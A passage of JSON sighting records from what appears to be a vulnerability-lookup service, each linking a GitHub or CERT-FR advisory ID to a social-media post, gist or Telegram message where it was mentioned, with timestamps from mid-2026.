"https://bsky.app/profile/slackers.it/post/3mp34su7fvx26", "content": "", "creation_timestamp": "2026-06-25T00:01:29.554753Z"}, {"uuid": "4f673773-7a0b-46f6-bdcf-b6d6a0dec7d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pjjp-65r7-ppgm", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3mp34su7fvx26", "content": "", "creation_timestamp": "2026-06-25T00:01:29.531228Z"}, {"uuid": "3df18330-4abb-4a28-95ac-19d5faee3e60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2j2x-hqr9-3h42", "type": "seen", "source": "https://gist.github.com/konard/fbf16282aa667cba7898796d06c29d42", "content": "", "creation_timestamp": "2026-06-25T02:34:06.275571Z"}, {"uuid": "74f683df-d607-4976-9f4c-206c45693d1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2j2x-hqr9-3h42", "type": "seen", "source": "https://gist.github.com/konard/69ec841af999545533e3eed9e1a7db8f", "content": "", "creation_timestamp": "2026-06-25T02:49:13.831400Z"}, {"uuid": "cc699496-a6fd-4811-8ea8-9dfb3bcfb2a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m99r-2hxc-cp3q", "type": "seen", "source": "https://gist.github.com/muhamedfazalps/db2c0e46436e75ee35dd214e14e27b40", "content": "", "creation_timestamp": "2026-06-25T05:43:10.883663Z"}, {"uuid": "211feb20-94e0-42ab-bddf-a46888200607", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pvg3-6q9j-mj3x", "type": "seen", "source": "https://gist.github.com/alon710/dac60322612f13505c26a5da70995cbf", "content": "", "creation_timestamp": "2026-09-17T10:31:40.502515Z"}, {"uuid": "97b767fc-437e-4adf-8d5c-b65b3335c4d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qff7-4q6c-m8h6", "type": "seen", "source": "https://bsky.app/profile/thomasp.social.vivaldi.net.ap.brid.gy/post/3mp4kdyhji2h2", "content": "", "creation_timestamp": "2026-06-25T13:36:57.007351Z"}, {"uuid": "a8b11d55-8c45-40ca-979c-7a69c2287ef4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fr4h-3cph-29xv", "type": "seen", "source": "https://gist.github.com/alon710/cd2ea8f2476653fb40753d5cd0d6d64b", "content": "", "creation_timestamp": "2026-06-27T04:42:28.746856Z"}, {"uuid": "60027eb5-19cb-413d-bc71-fea53926d97b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WW5P-J6CJ-6MQQ", "type": "seen", "source": "https://gist.github.com/alon710/50034d243d8ecc5094ce95388ae028b5", "content": "", "creation_timestamp": "2026-06-27T05:12:34.454311Z"}, {"uuid": "8a03e072-0ce8-4693-bae1-928032006996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v23m-ccfg-pq9h", "type": "seen", "source": "https://gist.github.com/alon710/df5b0744014030db937f68dddaa36b9f", "content": "", "creation_timestamp": "2026-06-27T07:12:30.909503Z"}, {"uuid": "b7922070-6d76-407a-9799-f2d95b97da45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-028", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mpinp5n23i2u", "content": "", "creation_timestamp": "2026-06-30T09:08:15.357003Z"}, {"uuid": "e3822e4f-8849-4335-b836-c0cfa003174d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2c4f-86xc-cr74", "type": "seen", "source": "https://gist.github.com/alon710/5ca87f854f57efb9963c43bcb0769b58", "content": "", "creation_timestamp": "2026-09-17T04:31:34.958174Z"}, {"uuid": "fb2cf0fd-65cc-4994-af32-f3b74a972b3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-33f5-2c5q-wgwj", "type": "seen", "source": "https://gist.github.com/alon710/16597bd55d59e6c89394c487c227381c", "content": "", "creation_timestamp": "2026-09-17T03:31:23.799530Z"}, {"uuid": "7ad3d29d-7661-4558-b344-2c514f553974", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9pj6-vhgr-3mwh", "type": "seen", "source": "https://gist.github.com/alon710/db9fb10afa43797b42605078feda688f", "content": "", "creation_timestamp": "2026-09-17T02:31:48.327944Z"}, {"uuid": "0f0b15f8-3749-4822-8b82-8545d153ba43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mxm6-v9r6-r94c", "type": "seen", "source": "https://gist.github.com/alon710/5ecaf58f0525c80ea68a1ae98625c2a7", "content": "", "creation_timestamp": "2026-09-17T01:31:24.328360Z"}, {"uuid": "91b35345-8b5f-4e7a-825d-388dfea06514", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ffmg-hfvg-jhg9", "type": "seen", "source": "https://gist.github.com/alon710/9e473404cc3dda3bbd60707d9a5ddbdd", "content": "", "creation_timestamp": "2026-09-17T00:31:25.493497Z"}, {"uuid": "c7d19776-be88-45b2-8561-263a8e8051a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g3pg-frfm-pr2m", "type": "seen", "source": "https://gist.github.com/alon710/578422b703a61d9f7998d7bc971d97e1", "content": "", "creation_timestamp": "2026-09-16T23:32:21.048724Z"}, {"uuid": "444be542-e7ed-466c-a63d-9ff7dcb83d76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xhhm-f6hp-2qwj", "type": "seen", "source": "https://gist.github.com/alon710/adad858617714b6e11a8b77f97f82b9a", "content": "", "creation_timestamp": "2026-09-16T22:31:42.385165Z"}, {"uuid": "969688a9-3b86-4041-a9a6-747439115831", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-72gw-mp4g-v24j", "type": "seen", "source": "https://gist.github.com/konard/2d84a73c0ff6413bca5b0e79fa90d50e", "content": "", "creation_timestamp": "2026-07-02T16:42:59.201177Z"}, {"uuid": "0a5afc9f-f8ed-462e-b526-68efa7089532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3p4h-7m6x-2hcm", "type": "seen", "source": "https://gist.github.com/konard/2d84a73c0ff6413bca5b0e79fa90d50e", "content": "", "creation_timestamp": "2026-07-02T16:42:57.982143Z"}, {"uuid": "b52b46b1-3b4d-4590-8f0b-b4b4d8df5103", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vrm6-8vpv-qv8q", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:17.899269Z"}, {"uuid": "b8a183d4-901c-4d7c-9fa2-3a0113a09123", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2mjp-6q6p-2qxm", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:16.624877Z"}, {"uuid": "60cbfe2c-573c-46ca-9300-feb3ccab4943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5hq-g745-h8pq", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:15.025156Z"}, {"uuid": "fd669de6-de33-4a33-8fa1-19afc09ce5d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-35p6-xmwp-9g52", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:13.587274Z"}, {"uuid": "5e74a394-30f1-41b9-a64f-4a97449b65e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v9p9-hfj2-hcw8", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:12.098981Z"}, {"uuid": "c0fdb9f8-a552-4fe4-9404-7e01eb3c44f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g9mf-h72j-4rw9", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:10.617522Z"}, {"uuid": "00486650-8a60-4842-babc-a24cbafe97c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g8m3-5g58-fq7m", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:09.122705Z"}, {"uuid": "841c0ff9-64c5-4486-95c6-29e4f7478bdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vxpw-j846-p89q", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:07.834093Z"}, {"uuid": "75d0d21c-7409-4b82-98c5-56b2a3e6b1a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4992-7rv2-5pvq", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:06.559972Z"}, {"uuid": "a4695d36-962b-453b-826e-87dd83b8260b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p88m-4jfj-68fv", "type": "seen", "source": "https://gist.github.com/konard/7292d01fd27ee78b9adfcdd581745d9e", "content": "", "creation_timestamp": "2026-07-02T16:42:05.207273Z"}, {"uuid": "9c054ae9-76d4-4d49-99a8-7e690a1faad5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gx3v-q759-g323", "type": "seen", "source": "https://bsky.app/profile/4sterisk.mi.tomadoi.com.ap.brid.gy/post/3mpsgyzp2lf22", "content": "", "creation_timestamp": "2026-07-04T06:35:52.254852Z"}, {"uuid": "cf334a0f-4860-4168-860f-83e54d090f48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v8vc-cmf9-gg2c", "type": "seen", "source": "https://bsky.app/profile/selfhost.directory/post/3mpt3zzsn3f2w", "content": "", "creation_timestamp": "2026-07-04T12:51:30.465662Z"}, {"uuid": "a4c3b3bf-41bb-412a-b415-ff084a613a51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qj7j-3jp8-8ccv", "type": "seen", "source": "https://gist.github.com/alon710/2046460989ab8e559515c0789ce99248", "content": "", "creation_timestamp": "2026-07-06T07:59:30.935665Z"}, {"uuid": "5585b011-3070-4c28-b60e-90acc7f8f42a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vjf3-2gpj-233v", "type": "seen", "source": "https://gist.github.com/alon710/8dfa8b639d7c92db923d54e0e8243293", "content": "", "creation_timestamp": "2026-07-06T07:59:30.849074Z"}, {"uuid": "17d73cc6-ece3-4437-ae63-ee0ce0f7c077", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f38q-mgvj-vph7", "type": "seen", "source": "https://gist.github.com/alon710/e1c58c0e5e300cd65a71e5b861eaf325", "content": "", "creation_timestamp": "2026-07-06T07:59:30.672854Z"}, {"uuid": "8b7af7e7-b037-4862-a1f3-b8be02c4ab01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vjf3-2gpj-233v", "type": "seen", "source": "https://gist.github.com/alon710/d7446e83b138301fa78ba45ab4a16d68", "content": "", "creation_timestamp": "2026-07-06T07:58:49.338206Z"}, {"uuid": "d04a6f1c-5a0d-4e29-80a5-864d34c905ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f38q-mgvj-vph7", "type": "seen", "source": "https://gist.github.com/alon710/85679449cb8fbdc65386d384f1841a0e", "content": "", "creation_timestamp": "2026-07-06T07:58:49.245686Z"}, {"uuid": "4a1dc91c-0b68-471c-a4dc-e045bf552c34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qj7j-3jp8-8ccv", "type": "seen", "source": "https://gist.github.com/alon710/55a58ea60e7552b2b158fa946acca5cd", "content": "", "creation_timestamp": "2026-07-06T07:58:49.055251Z"}, {"uuid": "31084557-d0b2-4b36-a3d7-a7d8154045ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v4p8-mg3p-g94g", "type": "seen", "source": "https://bsky.app/profile/alphahunt.io/post/3mpy5bjtr7l2z", "content": "", "creation_timestamp": "2026-07-06T12:56:59.500611Z"}, {"uuid": "70c16f14-6e87-4d9a-8dce-583596765bee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v4p8-mg3p-g94g", "type": "seen", "source": "https://bsky.app/profile/alphahunt.io/post/3mpy5bjtr7k2z", "content": "", "creation_timestamp": "2026-07-06T12:56:59.059522Z"}, {"uuid": "96a402d1-9ead-4c76-a145-4d2499fe82ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v4p8-mg3p-g94g", "type": "seen", "source": "https://bsky.app/profile/alphahunt.io/post/3mpy5bjtqac2z", "content": "", "creation_timestamp": "2026-07-06T12:56:58.609400Z"}, {"uuid": "d14ea6a4-57a9-4065-80ca-a7d315a6eb49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v4p8-mg3p-g94g", "type": "seen", "source": "https://bsky.app/profile/alphahunt.io/post/3mpy5bjtigc2z", "content": "", "creation_timestamp": "2026-07-06T12:56:58.147479Z"}, {"uuid": "486ee320-0d49-4085-9a59-2a649be5344a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-029", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116873372689629084", "content": "", "creation_timestamp": "2026-07-06T13:55:47.029435Z"}, {"uuid": "5872e949-36ab-4467-94c1-b8c5582d11d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-029", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mpyakobmvx2m", "content": "", "creation_timestamp": "2026-07-06T13:55:41.968487Z"}, {"uuid": "e064f1d0-2b15-448e-8f2b-2574186e511b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-22m2-hvr2-xqc8", "type": "seen", "source": "https://bsky.app/profile/malwareobserver.bsky.social/post/3mpybw7ndmy2r", "content": "", "creation_timestamp": "2026-07-06T14:20:05.158085Z"}, {"uuid": "46168be8-8594-455a-bf48-543ead13b8cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-029", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mpyh7lhfh72w", "content": "", "creation_timestamp": "2026-07-06T15:54:46.324413Z"}, {"uuid": "aafbe605-c19c-4a8f-9b7f-6bd0dad3432c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7JVP-HJ45-2F2M", "type": "seen", "source": "https://gist.github.com/alon710/3392c028816ef9767631ce548afd9d91", "content": "", "creation_timestamp": "2026-07-06T17:41:59.860799Z"}, {"uuid": "24cf3039-d9a6-4ae0-9280-a3c459e92eea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f75j-4cw6-rmx4", "type": "seen", "source": "https://bsky.app/profile/poxek.bsky.social/post/3mq3imox2uw2x", "content": "", "creation_timestamp": "2026-07-07T20:58:14.838692Z"}, {"uuid": "96e2a38a-433d-4050-a006-bf7cf9f417b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f75j-4cw6-rmx4", "type": "seen", "source": "https://bsky.app/profile/poxek.bsky.social/post/3mq3imox2uv2x", "content": "", "creation_timestamp": "2026-07-07T20:58:13.494361Z"}, {"uuid": "29d90e33-f367-4131-ae9c-313241e12eee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f75j-4cw6-rmx4", "type": "seen", "source": "https://bsky.app/profile/poxek.bsky.social/post/3mq3imox2uu2x", "content": "", "creation_timestamp": "2026-07-07T20:58:12.120558Z"}, {"uuid": "3f7f8394-7f1d-4b13-9f22-71e8dd0f8054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f75j-4cw6-rmx4", "type": "seen", "source": "https://bsky.app/profile/poxek.bsky.social/post/3mq3imnlkce2x", "content": "", "creation_timestamp": "2026-07-07T20:58:10.762936Z"}, {"uuid": "7d3847c0-3ae8-474f-9079-c8c95e7f9a20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f75j-4cw6-rmx4", "type": "seen", "source": "https://bsky.app/profile/poxek.bsky.social/post/3mq3imnlkcd2x", "content": "", "creation_timestamp": "2026-07-07T20:58:09.079989Z"}, {"uuid": "a8ab5563-3078-4add-8e86-1d82647c5bd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f75j-4cw6-rmx4", "type": "seen", "source": "https://bsky.app/profile/poxek.bsky.social/post/3mq3imnljd32x", "content": "", "creation_timestamp": "2026-07-07T20:58:07.704171Z"}, {"uuid": "b886d956-583c-42ca-ba9f-3cc70d11d75b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f75j-4cw6-rmx4", "type": "seen", "source": "https://bsky.app/profile/poxek.bsky.social/post/3mq3imnljd22x", "content": "", "creation_timestamp": "2026-07-07T20:58:06.351161Z"}, {"uuid": "a7bdfdd0-3310-4f26-bc48-022d6810e1b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f75j-4cw6-rmx4", "type": "seen", "source": "https://bsky.app/profile/poxek.bsky.social/post/3mq3imnlegs2x", "content": "", "creation_timestamp": "2026-07-07T20:58:05.009171Z"}, {"uuid": "917014f4-33a2-48e3-917e-0c2d0bf1d7b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WHXG-WX83-85P5", "type": "seen", "source": "https://t.me/brutsecurity/985", "content": "", "creation_timestamp": "2026-07-09T03:00:12.472353Z"}, {"uuid": "2de99151-6fc4-4a87-8c69-2a6dadd83a70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pg97-jvmf-qfvc", "type": "seen", "source": "https://gist.github.com/alon710/4438d7405fbc4cb7f575ade1c1585b2a", "content": "", "creation_timestamp": "2026-09-16T16:32:20.051821Z"}, {"uuid": "9cec1444-8267-42dc-a1e6-6607ae99ad6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9g8f-h8f3-hjcm", "type": "seen", "source": "https://bsky.app/profile/selfhost.directory/post/3mq4dkpqdgy2h", "content": "", "creation_timestamp": "2026-07-08T05:00:05.131171Z"}, {"uuid": "171f414c-e273-4bf3-86e3-0e05e13c12ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g9xf-7f8q-9mcj", "type": "seen", "source": "https://gist.github.com/alon710/29f907693324d6187f6b141f2c73d47b", "content": "", "creation_timestamp": "2026-07-09T21:41:51.017882Z"}, {"uuid": "a283f77e-9203-465e-a17e-ac70ab93ae0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-px5m-h76g-p7p8", "type": "seen", "source": "https://gist.github.com/alon710/7957cb9c4dd6636892863390d2a98c29", "content": "", "creation_timestamp": "2026-07-09T22:12:01.814663Z"}, {"uuid": "2c893848-f591-41da-b104-ebf3380528e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g586-ccqf-7x4r", "type": "seen", "source": "https://gist.github.com/alon710/be308f55a57246cb8ce657d04b30b2e9", "content": "", "creation_timestamp": "2026-07-09T23:42:44.364119Z"}, {"uuid": "e447849b-3db2-43bf-8627-bd36cc2a2860", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qcq2-496w-v96p", "type": "seen", "source": "https://gist.github.com/alon710/ac77807be35ab79d5b8543a7caac77a2", "content": "", "creation_timestamp": "2026-07-10T00:11:47.178102Z"}, {"uuid": "f8613296-4a21-4f44-9957-86afe0bdb0f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g586-ccqf-7x4r", "type": "seen", "source": "https://gist.github.com/alon710/be308f55a57246cb8ce657d04b30b2e9", "content": "", "creation_timestamp": "2026-07-10T00:00:25.864539Z"}, {"uuid": "f95cb654-c2d5-4faa-8091-645cd529ca9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-67RR-84XM-4C7R", "type": "seen", "source": "https://t.me/brutsecurity/2040", "content": "", "creation_timestamp": "2026-07-10T00:00:14.935503Z"}, {"uuid": "f0de5fb9-61f7-40e1-a888-8d8db9394dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QCJ2-99CG-MPPF", "type": "seen", "source": "https://t.me/brutsecurity/2141", "content": "", "creation_timestamp": "2026-07-10T00:00:14.404503Z"}, {"uuid": "375ec3a7-47fe-4d26-aedb-0d4a0ca3e4a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-M42G-XG4C-5F3H", "type": "seen", "source": "https://t.me/brutsecurity/2189", "content": "", "creation_timestamp": "2026-07-10T00:00:14.048721Z"}, {"uuid": "6a445d09-dc57-40c5-9af7-51ba30b62458", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7229-Q9PV-J6P4", "type": "seen", "source": "https://t.me/brutsecurity/2267", "content": "", "creation_timestamp": "2026-07-10T00:00:13.942965Z"}, {"uuid": "7c0628bc-d37d-450a-892b-0a9c039b16d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W7XJ-8FX7-WFCH", "type": "seen", "source": "https://t.me/brutsecurity/2387", "content": "", "creation_timestamp": "2026-07-10T00:00:13.578968Z"}, {"uuid": "c470c443-fc46-409b-87cc-f3e1434b1bc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HF5-MC28-XMCV", "type": "seen", "source": "https://t.me/brutsecurity/2451", "content": "", "creation_timestamp": "2026-07-10T00:00:13.297454Z"}, {"uuid": "9173695f-3e29-4a57-902b-69ab2a65bd67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-28jh-g32x-v9v4", "type": "seen", "source": "https://gist.github.com/alon710/5cf8fa01fdabad32641db4fb6525028d", "content": "", "creation_timestamp": "2026-07-10T00:42:13.361965Z"}, {"uuid": "df27e848-4907-412b-a22e-3f692a3ffd04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h74c-q9j7-mpcm", "type": "seen", "source": "https://gist.github.com/alon710/c57bf8187a7fb4d8c5e9247f7948a17b", "content": "", "creation_timestamp": "2026-07-10T01:12:43.571573Z"}, {"uuid": 